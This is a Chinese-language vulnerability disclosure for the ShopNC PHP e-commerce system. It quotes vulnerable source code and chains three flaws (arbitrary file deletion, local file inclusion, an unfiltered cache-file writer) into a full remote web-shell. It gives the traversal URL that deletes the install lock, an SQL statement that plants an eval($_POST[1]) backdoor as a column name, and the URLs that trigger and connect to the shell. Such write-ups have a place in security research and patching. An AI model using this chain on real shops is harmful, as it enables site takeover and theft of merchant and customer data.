ShopNC多个漏洞(可暴力 getshell)

前言 ShopNC是一款S是网城创想公司旗下服务于企业客户的电子商务系统,基于PHP5技术采用MVC 模式开发,本文介绍了shopnc多个漏洞结合,可getshell有点暴力-_- 任意文件删除 文件 control\store.php 1438 行 (还有几个同样的地方) [php] ........ $model_upload = Model('upload'); $file_info = $model_upload->getOneUpload(intval($_GET['file_id'])); if(!$file_info){ @unlink(ATTACH_SLIDE.DS.$_GET['img_src']); }else{ ........[/php] 本地文件包含 文件 /framework/core/base.php 71行 [php] $act_file = realpath( BasePath.DS."control".DS.$_GET['act'].".php" ); } if ( is_file( $act_file ) ) { require( $act_file ); $class_name = $_GET['act']."Control"; if ( class_exists( $class_name ) )[/php] 后台更新缓存写shell 文件 model/adv_model.php 416 行 [php] /** * 更新一条广告缓存 * * @param unknown_type $adv * @return unknown */ public function makeAdvCache($adv){ $lang = Language::getLangContent(); $tmp .= " 0){ $condition['adv_id'] = $adv; $adv_info = $this->getList($condition); $adv = $adv_info['0']; } .................................. $content = addslashes($v); $cache_file = BasePath.'/cache/adv/adv_'.$adv['adv_id'].'.cache.php'; file_put_contents($cache_file,$tmp); [/php] 继续跟进getList函数 [php] public function getList($condition=array(), $page='', $limit='', $orderby=''){ $param = array(); $param['table'] = 'adv'; $param['field'] = $condition['field']?$condition['field']:'*'; $param['where'] = $this->getCondition($condition); if($orderby == ''){ $param['order'] = 'slide_sort, adv_id desc'; }else{ $param['order'] = $orderby; } $param['limit'] = $limit; return Db::select($param,$page); } [/php] 写文件时,从数据库中遍历key,跟value 未过滤key,key 可以从数据库读取,当有数据库可控时,即可写入任意文件. ShopNc GetShell 结合以上三个漏洞,即可优雅的 getshell 任意文件删除 => 重装 => 更改数据库 shopnc_adv 键值 =>更新广告缓存 =>getshell 具体步骤 1:[php]http://0day5.com/index.php?act=store&op=dorp_img&file_id=16&img_src=/../../../install/lock[/php] 2:重装系统 3:进入MySQL 执行[php]sql ALTER TABLE `shopnc_adv` ADD `{eval($_POST[1])}` VARCHAR( 100 ) NOT NULL [/php] 4:进入后台 更新广告缓存 [php] http://0day5.com/admin/index.php?act=adv&op=adv_edit&adv_id=14[/php] 5:连接shell [php]http://0day5.com/index.php?act=../cache/adv/adv_14.cache[/php] Author:Yaseng

发表评论